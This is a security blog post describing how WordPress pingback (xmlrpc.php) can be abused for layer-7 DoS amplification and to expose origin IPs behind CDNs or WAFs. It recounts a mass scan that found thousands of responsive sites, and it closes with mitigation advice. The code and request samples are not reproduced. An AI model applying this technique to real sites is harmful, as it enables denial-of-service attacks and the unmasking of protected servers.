DoS Amplification and CDN/Load Balancer/WAF bypass. This article aims to show you how easily you can collect WordPress pingback by Google search, crawling the Alexa top 1 million websites, Shodan search, and crawling CommonCrawl. I'll show you how WordPress Pingback can be used to reveal the webserver's origin IP Address.

TL;DR – start –

35% of the internet is powered by WordPress, so I tried to collect as many pingback services as I can by:

  • Manually Googling search sites containing "xmlrpc": very few pingback
  • Searching on Shodan for pingback response headers: hundred of pingback
  • Crawling Alexa top 1m: more than 5K pingback found
  • Parsing latest CommonCrawl archive (first 500K WordPress): 7500 pingback found

TL;DR – end –

Despite the WordPress pingback involvement on DoS attacks being discovered back in 2012, is still a real threat for preventing or mitigating layer 7 DoS attacks.

Quoting Wikipedia:

A pingback is one of three types of linkbacks, methods for Web authors to request notification when somebody links to one of their documents. This enables authors to keep track of who is linking to, or referring to their articles. Some weblog software, such as Movable Type, Serendipity, WordPress, and Telligent Community, support automatic pingbacks where all the links in a published article can be pinged when the article is published.

As described by WordPress, the best way to think about pingbacks is as remote comments:

  • Person A posts something on his blog.
  • Person B posts on her own blog, linking to Person A’s post. This automatically sends a pingback to Person A when both have pingback enabled blogs.
  • Person A’s blog receives the pingback, then automatically goes to Person B’s post to confirm that the pingback did, in fact, originate there.

And as Acunetix wrote on their blog, WordPress has an XMLRPC API that can be accessed through the xmlrpc.php file. One of the methods exposed through this API is the pingback.ping method. With this method, other blogs can announce pingbacks. When WordPress is processing pingbacks, it’s trying to resolve the source URL, and if successful, will make a request to that URL and inspect the response for a link to a certain WordPress blog post. If it finds such a link, it will post a comment on this blog post announcing that somebody mentioned this blog post in their blog.

The problem here is that many DoS stresser/booter services use WordPress pingback functionality to hide their IP to exhausting victim server resources. Following a screenshot of a stresser/booter service that anyone can rent for a DoS attack starting from 30$/month:

DoS Amplification

When the attacker sends a pingback request to a WordPress, he/she receives few kb of response from it. If the target URL on the victim's website has a big content (such as a PDF or a Video) or a page that takes a long time to select on victim's application database, this would cause an amplification attack. In other words, for a relatively small request from the attacker to the WordPress website, the latter will connect to the victim and cause a large amount of traffic:

Discover real IP address

As I write before, when WordPress is processing pingbacks it tries to resolve the source URL and, if successful, will make a request to that URL and inspect the response for a link to a certain WordPress blog post. When this happens, the "victim's webserver" receives an HTTP request from the WordPress website. By exploiting this functionality an attacker can request a pingback on an own webserver and discover the real IP address of the WordPress website even if it's behind a WAF as a service or a CDN service.

You can find more information about this technique here:

Crawling, crawling, crawling... rawhide!

My first attempt to crawl the Alexa top 1m list was a failure! Many websites banned my VPS IP address due to "aggressive" crawling and, moreover, many websites do a geographic ban and I don't have more than 1 IP address geolocated in Europe.

Inspired by the beautiful work made by Scott Helme on his crawler.ninja I decided to crawl the Alexa Top 1 million websites looking for /xmlrpc.php to see how many websites on the top 1m list has the WordPress pingback functionality.

First of all, I wrote a crawler in python, using multi-thread functionality sourced by module "concurrent". Unfortunately, my crawler isn't perfect yet, and due to timeouts, 2nd level domains that dosn't resolve to any IP, ban IP/subnet of my VPS hosting, etc... I wasn't able to collect data from all million websites but "only" from 446,370 of those.

Even if I wasn't able to crawl all websites, I decided that "almost a half" is good enough for the first time. So, for each website I've collected the following information into Elasticsearch:

Field Description
schemehttp or https to contact the {url}
urlthe "final" URL after all redirection (such as 301 and 302 response status)
netlocthe netloc value of urlparse(url)
statusthe response status code
headersall response headers
bannerthe server banner (such as Apache, Nginx, etc...)
wafgussing the presence of a WAF by analyzing the server banner or response set-cookie
xmlrpcthe response status code of a request to {scheme}://{url}/xmlrpc.php

Now, to get all websites having the /xmlrpc.php reachable in which I want to test the pingback functionality, I have done this query: "give me all websites with /xmlrpc.php and with response code = 405":

Once got the list, I want to test pingback on all 103,612 websites. For doing it, I need to make all WordPress to send a pingback to an external website in which receive the pingback and saves the target URL and the source IP Address that contacted my website. It was easy since WordPress put his URL inside the User-Agent request header together with the WordPress Version. So, I created a PHP script that writes to a JSON file: URL, IP, and Version for each HTTP request received.

To send a pingback request I just need to send the following request to each 103612 WordPress specifying two parameters: the pingback target URL and a local URL:

after a successfull pingback I should receive an HTTP request to my webserver and I should receive a response like this:

Following a request logged by my webserver, as you can see the User-Agent contains URL, origin IP and WordPress version:

When the script has done, it has collected 5142 pingback from WordPress all over the world! Following some stats:

  • 5142 different websites from which I received a pingback
  • 108 different WordPress version
  • 4582 unique origin IPs

Now that I've my botnet (joking 😂) I would like to see how many of those websites are behind a CDN/WAF such as CloudFlare trying to hide their IP address. So, I've correlated the URL received in the User-Agent of the pingback request and the entry I have in my elasticsearch trying to guess if the target website is behind a WAF or CDN. I found 543 websites that expose their real IP address.

I want more.

35% of the Internet is Powered by WordPress and considering that the number of total active websites is estimated at over 1.3 billion according to a survey published by Netcraft, it means that 455 milion websites are using WordPress. I think I can find more than 5K pingback services if I find a way to crawl better the internet but... how?

I discovered a beautiful project named Common Crawl that is an "open repository of web crawl data that can be accessed and analyzed by anyone". The data I used was crawled between November 23 and December 6 and contains 2.64 billion web pages or 270 TiB of uncompressed content.

In this way, I don't need to crawl websites but I can just access the data resulting from the CommonCrawl crawler and try to intercept WordPress websites. I've collected the first 500K WordPress websites and I've tried to collect pingback services.

Doing it I found 7500 active pingback services from which I received a pingback request to my website.

I tried to inform but...

It seems that many companies/gov websites/military websites are not interested in this problem, and many of those didn't reply to my mails in which I tried to inform them about this problem. I found a lot of "big" website that expose their oridin IP address and that can be involved to DoS Amplification Attacks. Some statistics:

Top TLD

https://www.rev3rse.it/wp_tld.csv

Top WordPress Version

Since that WordPress pingback put his version on the User-Agent request header, this is the most used versions of WordPress with an active and working pingback service https://www.rev3rse.it/wp_versions.csv

Netname

https://www.rev3rse.it/wp_netnames.csv

How to prevent?

If you're not running a WordPress website or you're not interested in receiving pingback from others WordPress (and moreover you want to prevent DoS Amplification Attacks) you have a lot of ways to blocks requests coming from WordPress pingback by filtering the request header User-Agent.

If your website or web application is behind an AWS load balancer, you can easily block it by creating a new rule:

Or if you want to do something similar on Nginx:

Or via ModSecurity SecRule

I'll update this article once I finish to parse the whole CommonCrawl database.
Follow me on twitter to get updates!


Learn More About The Images We Choose

Today we are celebrating the work of artist Zaki Abdelmounim and joining him in his hunt for what's left of Hong Kong's iconic neon signs, an essential element of this cityscape's visual culture, covering HK's streets for years with glow. We will roam the dazzling roads aimlessly reminiscing about a dystopian past that only existed in neo-noire cult fiction movies like Blade Runner, trying to burn these lively picturesque streets into our memories before they vanish, all while figuring out how to thrive creatively in this organized chaos. Hopefully this vaporwave stylized series of street photography will bring as much joy as it did to us.

The beautiful image used in this article was created by Zaki Abdelmounim.